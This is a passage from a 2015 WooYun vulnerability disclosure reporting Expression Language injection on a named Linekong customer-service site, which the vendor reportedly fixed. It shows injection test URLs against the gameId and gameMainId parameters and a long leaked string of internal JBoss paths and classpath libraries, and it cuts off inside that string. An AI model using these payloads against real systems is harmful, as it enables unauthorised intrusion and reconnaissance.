当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122286

漏洞标题:蓝港在线某子站Expression language injection及远程命令执行漏洞

相关厂商:linekong.com

漏洞作者: Ysql404

提交时间:2015-06-23 19:35

修复时间:2015-07-01 10:03

公开时间:2015-07-01 10:03

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-07-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

蓝港在线某子站Expression language injection及远程命令执行漏洞

详细说明:

站点:http://kefu.linekong.com
Expression language injection参考:
WooYun: 大众点评某站点Expression language injection
WooYun: 杭州市人力资源和社会保障网Expression language injection(可利用)
一、Expression language injection
地址1:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
测试效果:

QQ图片20150623144319.png


打开该地址并查看源代码: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4

/eService/system/generateRandomcode.do?gameId=%7Bfreemarker.Configuration%3Dfreemarker.template.Configuration%40109037d%2C+javax.servlet.context.tempdir%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fwork%2Fjboss.web%2Flocalhost%2FeService%2C+org.apache.catalina.jsp_classpath%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1995774417485222525servlets-webdav.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fnamespace.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Flocaledata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-api-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-1.0.4.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcatalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-management.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinkongXworkExt-1.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flucene-core-2.4.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7316256627554902626jasper-compiler-jdt.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3920996984715942540jboss-ws4ee.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7302355716144682924jasper-compiler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-aop.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-config-browser-plugin-2.0.11.2.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunpkcs11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxwork-2.0.5.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstandard.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-system.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp9054605725472407847uuid-key-generator.sar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4721933770079764377asm.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7736534739160670581odmg-3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxml-apis.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fresolver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbosssx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6494116799749547601asm-attrs.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-beanutils-1.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar-contents%2Fjboss-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjson-lib-2.2.3-jdk15.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fojdbc14.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3338334323483414043tomcat-coyote.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-common-jdbc-wrapper.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-common.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Flog4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7388988018869166078jboss-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbcel.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fsnmp-support.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3107141233706702374hibernate-metadata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinekongUtil.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-codec-1.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjaxen.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fedb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fclasses12.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-deployer.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-tabletags.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjstl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fbin%2Frun.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp112530474983911386hibernate3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Flog4j-boot.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-validator-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jsr77.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7886344676930699333jboss-hibernate.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6517159087966278511commons-el.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fdom4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-ws4ee.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jca.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-chain-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3101766708196706282servlets-default.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8163783107672278399tomcat55-service.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1928911703526671619servlets-invoker.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar-contents%2Fjboss-ha-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3235264501345629664javassist.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fwebcallbackhandler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjmx-adaptor-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbindingservice-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-jmx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fautonumber-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp77632742320883920jasper-runtime.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjsonplugin-0%5B1%5D.31.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-monitoring.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5913486598487930136trove.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-io-1.3.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp2498765583516090332tomcat-http.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fdwr-1.1-beta-3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8171336813031228483axis-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6336219452933413902antlr-2.7.5H3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-httpclient-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fognl-2.6.11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3332293537302222734catalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5458039299239960074tomcat-ajp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-collections-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4440913937618162919cglib-2.1.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunjce_provider.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6346206992602066763jboss-aop.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar-contents%2Fjboss-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Ffreemarker-2.3.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flog4j-1.2.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-httpclient.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fconcurrent.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-logging.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Fclasses%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxmlrpc-2.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3702522107702055184commons-modeler.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fdnsns.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjdom.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-j2ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-codebehind-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1099151691146069103wsdl4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6237404052211161026naming-resources.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxalan.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fezmorph-1.0.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar-contents%2Fmail-ra.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp393639702798507697commons-discovery.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Foro-2.0.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-lang-2.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-pattern.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2FxercesImpl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar-contents%2Fjboss-ha-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-hibernate.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Factivation.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjnpserver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin-example.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jaxrpc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-core-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2FROOT.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-saaj.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fconf%2F%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Flib%2Ftools.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbossmq.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6144956477623102918catalina-manager.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8301739402364757125tomcat-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscout.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fproperties-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3285496549751174622jboss-aspect-library.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jsp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D&gameMainId=4


地址2:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
测试效果:

QQ图片20150623144930.png


打开该地址,并查看源代码:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}

src="/eService/system/generateRandomcode.do?gameId=10&gameMainId=%7Bfreemarker.Configuration%3Dfreemarker.template.Configuration%40109037d%2C+javax.servlet.context.tempdir%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fwork%2Fjboss.web%2Flocalhost%2FeService%2C+org.apache.catalina.jsp_classpath%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1995774417485222525servlets-webdav.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fnamespace.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Flocaledata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-api-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-1.0.4.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcatalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-management.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinkongXworkExt-1.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flucene-core-2.4.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7316256627554902626jasper-compiler-jdt.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3920996984715942540jboss-ws4ee.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7302355716144682924jasper-compiler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-aop.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-config-browser-plugin-2.0.11.2.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunpkcs11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxwork-2.0.5.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdepl